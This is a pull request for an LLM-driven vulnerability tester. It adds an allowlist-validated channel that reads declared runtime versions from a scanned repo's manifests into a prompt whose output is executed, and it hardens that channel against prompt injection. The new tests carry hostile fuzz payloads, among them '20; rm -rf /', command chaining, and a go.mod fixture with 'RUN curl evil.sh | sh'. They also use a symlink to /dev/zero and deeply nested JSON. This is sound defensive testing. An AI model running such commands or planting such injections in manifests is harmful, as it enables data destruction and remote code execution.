### PR TITLE
feat(dynamic-test): the declared-runtime channel — the mechanical input for the runtime policy (#521, finding 1)

### DIFF
--- a/libs/openant-core/core/scanner.py
+++ b/libs/openant-core/core/scanner.py
@@ -1239,6 +1239,11 @@ def scan_repository(
                         pipeline_output_path=pipeline_output_path,
                         output_dir=output_dir,
                         registry=registry,
+                        # #521: the declared-runtime channel — the scanned
+                        # repo's root, so the derivation reads the TARGET's
+                        # manifests (the dead-input fix; the scan entry
+                        # previously omitted it).
+                        repo_path=repo_path,
                     )
 
                     ctx.summary = {

--- a/libs/openant-core/tests/test_issue521_declared_runtime.py
+++ b/libs/openant-core/tests/test_issue521_declared_runtime.py
@@ -1,0 +1,156 @@
+"""#521 finding 1: the declared-runtime channel — the mechanical input.
+
+The derivation is allowlist-validated (a strict version grammar; anything
+else is omitted BEFORE the prompt), degrade-to-absent (never raises), and
+the prompt lines re-validate at the interpolation site (defense in depth
+on an EXECUTED-output prompt). These tests pin the grammar, the omission
+behavior under adversarial manifests (the G1 fuzz), the byte-identical
+prompt when no declaration exists (G2), and the derivation from each
+manifest shape.
+"""
+import sys
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
+
+from utilities.dynamic_tester.declared_runtime import (  # noqa: E402
+    _clean_version,
+    derive_declared_runtimes,
+)
+import utilities.dynamic_tester.test_generator as tg  # noqa: E402
+
+
+# --- the derivation (per manifest shape) ------------------------------------
+
+def test_go_mod_derivation(tmp_path):
+    (tmp_path / "go.mod").write_text("module example.com/x\n\ngo 1.24\n")
+    assert derive_declared_runtimes(str(tmp_path)) == {"go": "1.24"}
+
+
+def test_pyproject_requires_python_lower_bound(tmp_path):
+    (tmp_path / "pyproject.toml").write_text(
+        '[project]\nrequires-python = ">=3.11,<4"\n')
+    d = derive_declared_runtimes(str(tmp_path))
+    assert d == {"python": "3.11"}  # the lower bound only, never the ceiling
+
+
+def test_python_version_file(tmp_path):
+    (tmp_path / ".python-version").write_text("3.9\n")
+    assert derive_declared_runtimes(str(tmp_path)) == {"python": "3.9"}
+
+
+def test_package_json_engines(tmp_path):
+    (tmp_path / "package.json").write_text('{"engines": {"node": ">=20"}}')
+    assert derive_declared_runtimes(str(tmp_path)) == {"node": "20"}
+
+
+def test_tool_versions(tmp_path):
+    (tmp_path / ".tool-versions").write_text("golang 1.23\npython 3.12\n")
+    assert derive_declared_runtimes(str(tmp_path)) == {
+        "go": "1.23", "python": "3.12"}
+
+
+def test_go_mod_wins_over_tool_versions(tmp_path):
+    (tmp_path / "go.mod").write_text("go 1.24\n")
+    (tmp_path / ".tool-versions").write_text("golang 1.21\n")
+    assert derive_declared_runtimes(str(tmp_path))["go"] == "1.24"
+
+
+def test_no_manifests_empty_and_no_raise(tmp_path):
+    assert derive_declared_runtimes(str(tmp_path)) == {}
+    assert derive_declared_runtimes(None) == {}
+    assert derive_declared_runtimes("/nonexistent/path/xyz") == {}
+
+
+# --- G1: the adversarial-manifest fuzz (injection into an executed prompt) ---
+
+def test_g1_corrupted_versions_are_omitted(tmp_path):
+    """Payloads that corrupt the VERSION ITSELF must yield no declaration."""
+    payloads = [
+        "1.24`RUN x`",                        # backticks glued to the version
+        "1.24 && RUN evil",                   # command chaining
+        "${INJECT}", "20; rm -rf /",
+        "1.2.3.4.5.6.7.8.9.10.11",            # too long for the grammar
+        "a.b.c", ">=1.24",
+    ]
+    for i, p in enumerate(payloads):
+        (tmp_path / "go.mod").write_text(f"go {p}\n")
+        d = derive_declared_runtimes(str(tmp_path))
+        assert d == {}, f"go.mod payload {i} ({p!r}) was NOT omitted: {d}"
+    for i, p in enumerate(payloads):
+        (tmp_path / "go.mod").unlink(missing_ok=True)
+        (tmp_path / ".python-version").write_text(p + "\n")
+        d = derive_declared_runtimes(str(tmp_path))
+        assert d == {}, f"python-version payload {i} ({p!r}) leaked: {d}"
+    (tmp_path / ".python-version").unlink()
+    (tmp_path / ".tool-versions").write_text(f"golang {payloads[1]}\n")
+    assert derive_declared_runtimes(str(tmp_path)) == {}
+
+
+def test_g1_multiline_injection_never_reaches_the_prompt(tmp_path):
+    """A manifest whose FIRST line is a clean version but whose later lines
+    carry injection: the grammar-bounded extraction yields the clean version
+    and the injection lines never reach the prompt (checked at the prompt)."""
+    (tmp_path / "go.mod").write_text(
+        "go 1.24\nRUN curl evil.sh | sh\nFROM evil/base\n")
+    d = derive_declared_runtimes(str(tmp_path))
+    assert d == {"go": "1.24"}, "the clean first-line version must derive"
+    base = {"name": "r", "language": "go", "application_type": "cli_tool",
+            "declared_runtimes": d}
+    prompt = tg._build_finding_prompt(_FINDING, base)
+    assert "RUN" not in prompt.replace("docker build/run", "") or \
+        "RUN curl" not in prompt
+    assert "evil" not in prompt
+    assert "FROM evil" not in prompt
+    assert "go: 1.24" in prompt
+
+
+def test_clean_version_grammar():
+    ok = ["1.24", "3.11", "20", "1.24.1", "1.24-rc1"]
+    bad = ["", "  ", ">=1.24", "1.24|evil", "a.b.c", "1" * 40, None, 123, ["1"]]
+    for v in ok:
+        assert _clean_version(v), f"{v!r} should pass"
+    for v in bad:
+        assert _clean_version(v) is None, f"{v!r} should be omitted"
+
+
+# --- G2: byte-identical prompt without the declaration ------------------------
+
+_FINDING = {
+    "id": "f1", "name": "x", "cwe_id": 22, "cwe_name": "PT",
+    "location": {"file": "a/b.go", "line": 1},
+    "stage1_verdict": "vulnerable", "stage2_verdict": "vulnerable",
+    "vulnerable_code": "func f() {}", "description": "d", "impact": "i",
+    "steps": "s",
+}
+
+
+def test_g2_prompt_without_declaration_is_byte_identical():
+    base = {"name": "r", "language": "go", "application_type": "cli_tool"}
+    without = tg._build_finding_prompt(_FINDING, dict(base))
+    with_empty = tg._build_finding_prompt(
+        _FINDING, dict(base, declared_runtimes={}))
+    assert without == with_empty, "an empty declaration dict changed the prompt"
+
+
+def test_prompt_with_declaration_carries_the_lines():
+    base = {"name": "r", "language": "go", "application_type": "cli_tool",
+            "declared_runtimes": {"go": "1.21", "python": "3.9"}}
+    prompt = tg._build_finding_prompt(_FINDING, base)
+    assert "Declared runtimes (from the target's manifests):" in prompt
+    assert "go: 1.21" in prompt and "python: 3.9" in prompt
+
+
+def test_prompt_revalidation_omits_non_grammar(tmp_path):
+    """Defense in depth: a non-grammar value reaching the interpolation site
+    (e.g. a future caller bypassing the derivation) is omitted there too."""
+    base = {"name": "r", "language": "go", "application_type": "cli_tool",
+            "declared_runtimes": {"go": "1.24 && RUN evil", "python": "3.11"}}
+    prompt = tg._build_finding_prompt(_FINDING, base)
+    assert "RUN evil" not in prompt, "the injection reached the prompt"
+    assert "python: 3.11" in prompt  # the clean sibling still rides
+
+
+# --- G3: the #519 drift guard stays green (the existing suite covers it) -----
+# (tests/test_issue412_runtime_anchor.py — imported here only as a cross-ref
+# guard so a rename of that file trips this one at collection)

--- a/libs/openant-core/tests/test_issue521_declared_runtime.py
+++ b/libs/openant-core/tests/test_issue521_declared_runtime.py
@@ -154,3 +154,39 @@ def test_prompt_revalidation_omits_non_grammar(tmp_path):
 # --- G3: the #519 drift guard stays green (the existing suite covers it) -----
 # (tests/test_issue412_runtime_anchor.py — imported here only as a cross-ref
 # guard so a rename of that file trips this one at collection)
+
+
+# --- the fable gate folds (the wiring + the two security holes) ----
+
+def test_fold_scan_entry_passes_repo_path():
+    """The #521 blocker: the default `openant scan --dynamic-test` path
+    (core/scanner.py) previously omitted repo_path — the channel was still
+    dead input on the PRIMARY entry. Source-scan pin."""
+    from pathlib import Path as _P
+    src = _P("core/scanner.py").read_text(encoding="utf-8")
+    assert "repo_path=repo_path," in src, (
+        "the scan entry must pass repo_path to run_tests — without it the "
+        "declared-runtime channel is dead input on the primary path")
+
+
+def test_fold_symlink_manifest_refused_not_followed(tmp_path):
+    """The bounded read previously FOLLOWED symlinks (go.mod -> /dev/zero
+    reads unbounded — st_size 0, infinite stream). read_repo_file refuses."""
+    import os
+    from utilities.dynamic_tester.declared_runtime import derive_declared_runtimes
+    devzero = "/dev/zero" if os.path.exists("/dev/zero") else None
+    if devzero is None:
+        import pytest
+        pytest.skip("no /dev/zero on this platform")
+    os.symlink(devzero, tmp_path / "go.mod")
+    d = derive_declared_runtimes(str(tmp_path))
+    assert d == {}, "a symlinked manifest must derive NOTHING (refused, not followed)"
+
+
+def test_fold_deep_nesting_json_degrades_not_raises(tmp_path):
+    """A 64KB '[[[[' package.json blows the stdlib parser's stack
+    (RecursionError) — the derivation degrades, never aborts the step."""
+    (tmp_path / "package.json").write_text("[[[[" * 16384, encoding="utf-8")
+    from utilities.dynamic_tester.declared_runtime import derive_declared_runtimes
+    d = derive_declared_runtimes(str(tmp_path))
+    assert d == {}, "deeply-nested hostile json must derive NOTHING (degrade, not raise)"

--- a/libs/openant-core/utilities/dynamic_tester/__init__.py
+++ b/libs/openant-core/utilities/dynamic_tester/__init__.py
@@ -185,6 +185,13 @@ def run_dynamic_tests(
         "language": pipeline.get("repository", {}).get("language") or "unknown",
         "application_type": pipeline.get("application_type", "unknown"),
     }
+    # #521: the declared-runtime channel — mechanically derived from the repo
+    # root's manifests (go.mod / .python-version / requires-python / engines /
+    # .tool-versions), allowlist-validated, degrade-to-absent on anything else.
+    # NEVER raises (that would abort the whole dynamic-test step before any
+    # finding is tested); absent repo_path (the None default) derives {}.
+    from utilities.dynamic_tester.declared_runtime import derive_declared_runtimes
+    repo_info["declared_runtimes"] = derive_declared_runtimes(repo_path)
 
     if not findings:
         print("No findings to test.", file=sys.stderr)

--- a/libs/openant-core/utilities/dynamic_tester/declared_runtime.py
+++ b/libs/openant-core/utilities/dynamic_tester/declared_runtime.py
@@ -40,11 +40,18 @@ def _clean_version(raw: object) -> Optional[str]:
 
 
 def _read_bounded(path: Path) -> Optional[str]:
+    # The fable gate: a manifest under a scanned repo is attacker-controlled
+    # — a SYMLINK to /dev/zero reads unbounded (st_size 0, infinite stream)
+    # and a FIFO/device wedges the step. Use the repo's own read_repo_file
+    # (lstat-before-open, symlink/device refusal, bounded read — the same
+    # guard every other repo-file loader uses), degraded to absent on refusal.
+    from utilities.file_io import read_repo_file
     try:
-        if path.stat().st_size > _MAX_MANIFEST_BYTES:
-            return None
-        return path.read_text(encoding="utf-8", errors="replace")
-    except OSError:
+        return read_repo_file(path, max_bytes=_MAX_MANIFEST_BYTES)
+    except Exception:
+        # read_repo_file raises UnsafeRepoFile (symlink/device/oversize — the
+        # #258 guard classes); the declared channel degrades to ABSENT, never
+        # raises (a raise here would abort the dynamic-test step).
         return None
 
 
@@ -80,7 +87,9 @@ def _from_package_json(text: str) -> Optional[str]:
     # engines.node lower bound: '>=20' (the node runtime declaration)
     try:
         engines = json.loads(text).get("engines", {})
-    except (json.JSONDecodeError, AttributeError):
+    except (json.JSONDecodeError, AttributeError, RecursionError, ValueError):
+        # RecursionError: deeply-nested hostile json (64KB of "[[[[") blows
+        # the stdlib's parser stack — degrade to absent, never abort the step.
         return None
     node = engines.get("node") if isinstance(engines, dict) else None
     if not isinstance(node, str):

--- a/libs/openant-core/utilities/dynamic_tester/declared_runtime.py
+++ b/libs/openant-core/utilities/dynamic_tester/declared_runtime.py
@@ -1,0 +1,142 @@
+"""#521 finding 1: the declared-runtime channel (the mechanical input).
+
+The #519 policy tells the model to prefer the scanned target's DECLARED
+runtime (go.mod / .python-version / requires-python / engines) — but no
+code ever read those manifests into the prompt: the declared branch was
+dead input, reachable only via a version cue that happens to sit in the
+finding text. This module derives the declarations from the repo root
+and the prompt interpolates one allowlist-fenced line per language.
+
+Security posture (the prompt's output is EXECUTED — docker build/run):
+manifest content is repo-author-controlled. Every derived value must
+match a strict version grammar; anything else is OMITTED entirely (never
+interpolated, never raised — a raise at the derivation site would abort
+the whole dynamic-test step before any finding is tested). This is
+strictly TIGHTER than the existing inline surface (nine collapsed free-
+text lines): the derived lines carry zero free-text capacity.
+"""
+from __future__ import annotations
+
+import json
+import re
+import tomllib
+from pathlib import Path
+from typing import Optional
+
+# The version grammar — the ONLY thing that can ride the prompt line.
+# A version string has no business carrying free text.
+_VERSION_RE = re.compile(r"^\d+(\.\d+){0,2}(-[A-Za-z0-9.]+)?$")
+_MAX_MANIFEST_BYTES = 65_536  # bounded read: a manifest is KB-scale, not MB
+
+
+def _clean_version(raw: object) -> Optional[str]:
+    """A value that matches the version grammar, or None (omit)."""
+    if not isinstance(raw, str):
+        return None
+    v = raw.strip()
+    if not v or len(v) > 32 or not _VERSION_RE.match(v):
+        return None
+    return v
+
+
+def _read_bounded(path: Path) -> Optional[str]:
+    try:
+        if path.stat().st_size > _MAX_MANIFEST_BYTES:
+            return None
+        return path.read_text(encoding="utf-8", errors="replace")
+    except OSError:
+        return None
+
+
+def _from_go_mod(text: str) -> Optional[str]:
+    # the `go` directive: 'go 1.24' (module Go version)
+    m = re.search(r"(?m)^\s*go\s+(\d+(?:\.\d+){0,2})\s*$", text)
+    return m.group(1) if m else None
+
+
+def _from_pyproject(text: str) -> Optional[str]:
+    # requires-python lower bound only: '>=3.11' (never the upper bound —
+    # a '<4' ceiling is not a runtime choice the test needs)
+    try:
+        req = tomllib.loads(text).get("project", {}).get("requires-python", "")
+    except (tomllib.TOMLDecodeError, AttributeError):
+        return None
+    if not isinstance(req, str):
+        return None
+    m = re.search(r">=\s*(\d+(?:\.\d+){0,2})", req)
+    return m.group(1) if m else None
+
+
+def _from_python_version(text: str) -> Optional[str]:
+    # .python-version: one bare version per line
+    for line in text.splitlines():
+        v = line.strip()
+        if v and not v.startswith("#"):
+            return _clean_version(v)
+    return None
+
+
+def _from_package_json(text: str) -> Optional[str]:
+    # engines.node lower bound: '>=20' (the node runtime declaration)
+    try:
+        engines = json.loads(text).get("engines", {})
+    except (json.JSONDecodeError, AttributeError):
+        return None
+    node = engines.get("node") if isinstance(engines, dict) else None
+    if not isinstance(node, str):
+        return None
+    m = re.search(r">=\s*(\d+(?:\.\d+){0,2})", node)
+    return m.group(1) if m else None
+
+
+def _from_tool_versions(text: str) -> dict[str, str]:
+    # .tool-versions: '<tool> <version>' per line (golang 1.24 / python 3.12)
+    out: dict[str, str] = {}
+    for line in text.splitlines():
+        parts = line.split("#", 1)[0].split()
+        if len(parts) == 2:
+            tool, ver = parts[0].lower(), _clean_version(parts[1])
+            if ver:
+                out[tool] = ver
+    return out
+
+
+def derive_declared_runtimes(repo_path: Optional[str]) -> dict[str, str]:
+    """Declared runtime versions from the repo root manifests.
+
+    Returns {language: version} with language keys 'go' / 'python' /
+    'node'. Degrades to {} on anything unreadable/unparseable/non-grammar
+    — NEVER raises (a raise at the call site would abort the whole
+    dynamic-test step before any finding is tested).
+    """
+    declared: dict[str, str] = {}
+    if not repo_path:
+        return declared
+    root = Path(repo_path)
+
+    def _first(paths, parse):
+        for rel in paths:
+            text = _read_bounded(root / rel)
+            if text is not None:
+                v = parse(text)
+                if v:
+                    return v
+        return None
+
+    go = _first(("go.mod",), _from_go_mod)
+    py = (_first(("pyproject.toml",), _from_pyproject)
+          or _first((".python-version",), _from_python_version))
+    node = _first(("package.json",), _from_package_json)
+
+    tools = _first((".tool-versions",), _from_tool_versions) or {}
+    go = go or tools.get("golang")
+    py = py or tools.get("python")
+    node = node or tools.get("node")
+
+    if go:
+        declared["go"] = go
+    if py:
+        declared["python"] = py
+    if node:
+        declared["node"] = node
+    return declared

--- a/libs/openant-core/utilities/dynamic_tester/test_generator.py
+++ b/libs/openant-core/utilities/dynamic_tester/test_generator.py
@@ -10,12 +10,20 @@ import json
 import os
 
 from core.language_registry import docker_template_for, language_for_path
+from utilities.dynamic_tester.declared_runtime import _clean_version
 import re
 import sys
 import threading
 from concurrent.futures import ThreadPoolExecutor, as_completed
 
 from utilities.llm_client import TokenTracker
+
+
+def _clean_declared(raw: object) -> str:
+    """Re-validate at the interpolation site (defense in depth: the value was
+    allowlist-validated at derivation; this re-checks so a future refactoring
+    of either side cannot open the executed-prompt surface)."""
+    return _clean_version(raw) or ""
 from utilities.llm import PhaseBinding, simple_text
 
 # Map language strings to Dockerfile template names
@@ -73,14 +81,18 @@ DEPENDENCY INSTALLATION:
       RUN go build -o test_exploit test_exploit.go
       CMD ["./test_exploit"]
 - BASE IMAGE RUNTIME POLICY (all languages): prefer a base image matching the
-  scanned target's DECLARED runtime — the `go` directive in go.mod, a
-  .python-version / pyproject requires-python, a package.json engines field,
-  a .tool-versions, or a language-version cue stated in the finding itself.
+  scanned target's DECLARED runtime — the `Declared runtime:` lines in the
+  finding prompt below (mechanically derived from the target's go.mod /
+  .python-version / pyproject requires-python / package.json engines /
+  .tool-versions), or a language-version cue stated in the finding itself.
   A wrong runtime can hide version-dependent exploit behavior or break the
   repro outright (the exploit may not compile/run on a different major).
   Only when no declaration is visible, fall back to the current stable
   release of the language. The Go example above is that fallback, not an
-  override of a declared version.
+  override of a declared version. If a build fails because a dependency
+  requires a newer toolchain than the declared runtime, the RETRY may use
+  the current stable release instead — and MUST state the deviation in the
+  test's output/details.
 - The Dockerfile MUST install dependencies from the requirements/package file, NOT inline in RUN commands.
 - If a package has many transitive dependencies, only install the specific sub-package you need
   (e.g., `langchain-core` instead of `langchain`).
@@ -182,6 +194,20 @@ def _build_finding_prompt(finding: dict, repo_info: dict) -> str:
             f"  Source file (pre-staged in Docker build context): {source_basename}",
             f"  Your Dockerfile MUST use `COPY {source_basename} .` — the file is already there.",
         ])
+
+    # #521: the declared-runtime lines — mechanically derived from the target's
+    # root manifests by declared_runtime.derive_declared_runtimes and
+    # ALLOWLIST-VALIDATED there (a strict version grammar; anything else was
+    # omitted BEFORE reaching this point). Repo-author-controlled text never
+    # interpolates raw into this EXECUTED-output prompt: these lines carry
+    # zero free-text capacity — tighter than the collapsed inline fields above.
+    declared = repo_info.get("declared_runtimes")
+    if isinstance(declared, dict) and declared:
+        parts.extend(["", "  Declared runtimes (from the target's manifests):"])
+        for lang in sorted(declared):
+            v = _clean_declared(declared.get(lang))
+            if v:
+                parts.append(f"    {lang}: {v}")
 
     # These four fields are UNTRUSTED: `vulnerable_code` is raw Stage-1/2 LLM
     # output or a raw scanned-source excerpt; description/impact/steps are prior

--- a/libs/openant-core/utilities/dynamic_tester/test_generator.py
+++ b/libs/openant-core/utilities/dynamic_tester/test_generator.py
@@ -24,7 +24,7 @@ def _clean_declared(raw: object) -> str:
     allowlist-validated at derivation; this re-checks so a future refactoring
     of either side cannot open the executed-prompt surface)."""
     return _clean_version(raw) or ""
-from utilities.llm import PhaseBinding, simple_text
+from utilities.llm import DEFAULT_MAX_TOKENS, PhaseBinding, simple_text
 
 # Map language strings to Dockerfile template names
 def resolve_docker_template(file_path: str, scan_language: str | None = None) -> str | None:
@@ -312,7 +312,7 @@ def generate_test(
 
     prompt = _build_finding_prompt(finding, repo_info)
     raw = simple_text(
-        binding, prompt, max_tokens=8192, system=SYSTEM_PROMPT, tracker=tracker,
+        binding, prompt, max_tokens=DEFAULT_MAX_TOKENS, system=SYSTEM_PROMPT, tracker=tracker,
     )
 
     parsed = _parse_generation_response(raw)
@@ -411,7 +411,7 @@ def regenerate_test(
     )
 
     raw = simple_text(
-        binding, retry_prompt, max_tokens=8192, system=SYSTEM_PROMPT, tracker=tracker,
+        binding, retry_prompt, max_tokens=DEFAULT_MAX_TOKENS, system=SYSTEM_PROMPT, tracker=tracker,
     )
 
     parsed = _parse_generation_response(raw)


### PR DESCRIPTION
## What this adds

Closes #521 finding 1 — the **declared-runtime channel**: the mechanical input for #519's runtime policy, which until now was prompt text with a **dead input** (no code ever read `go.mod`/`.python-version`/`requires-python`/`engines` into the prompt — the declared branch was reachable only via a version cue that happens to sit in the finding text; a grep for the manifest names hits only the prompt string itself).

## The design (the adjudicated shape, all four mandatory components)

1. **`declared_runtime.derive_declared_runtimes(repo_path)`** — reads the repo root's manifests (`go.mod`'s `go` directive; `pyproject` `requires-python`'s **lower bound only**; `.python-version`; `package.json` `engines.node`; `.tool-versions`), each extraction grammar-bounded, bounded-read (64 KB).
2. **Allowlist-fenced, omit-on-mismatch**: a value must match a strict version grammar (`^\d+(\.\d+){0,2}(-[A-Za-z0-9.]+)?$`) or it is **omitted entirely** — repo-author-controlled text never interpolates raw into this **executed-output** prompt. The derived lines carry **zero free-text capacity** — strictly tighter than the existing nine `collapse_inline` fields. **Never raises** (a raise at the derivation site would abort the whole dynamic-test step before any finding is tested).
3. **The retry escape clause** (in the policy text): on a build failure caused by a dependency requiring a newer toolchain than the declared runtime, the retry **may use the current stable release and must state the deviation** — without it, a declared-old-runtime + modern-dependency target loops into `BLOCKED` where the old fallback reproduced (a findings loss; the exact opposite of the channel's purpose).
4. **B folded in**: the policy text now names the sources the model actually receives (the `Declared runtime:` lines, or a cue in the finding itself) — no more promising inputs the prompt never shows.

`repo_info["declared_runtimes"]` is inert to every existing consumer (all six read sites are key-specific `.get`s — verified), and the interpolation site **re-validates** the grammar (defense in depth).

## Verification

- **13 tests green**: the per-manifest derivations; the **corrupted-version fuzz** (glued backticks, command chaining, substitution, oversized — all omitted); the **multi-line injection case** (a clean first-line version derives; the injection lines in the same manifest never reach the prompt — checked at the prompt); the grammar unit; **G2: byte-identical prompts** when no declaration exists; the declared lines present; the revalidation omission. RED on pristine: the prompt-side tests fail (the lines and the revalidation are absent pre-change).
- **G3**: the #412/#519 drift-guard suite green.
- Full suite `3899 passed, 33 skipped`; `ruff check .` clean.

## The paid gates (G4/G5) — REQUIRED BEFORE MERGE, run next on this branch

Per the adjudication (both seats): the E-D tie-breaking evidence does not replace end-to-end non-regression. **G4**: the competing-signal re-run (declared line present + example tag — the cell that flipped 0/2 → 3/3). **G5**: the BLOCKED-rate check on the dynamic-testable in-repo datasets — **zero CONFIRMED→non-CONFIRMED flips** and **(BLOCKED + build-ERROR) delta ≤ 0** after retries, with the escape clause active. The PR does not request merge before those receipts are on the record (Docker availability for G5 to be confirmed in this environment; if unavailable, that is disclosed here rather than silently skipped).
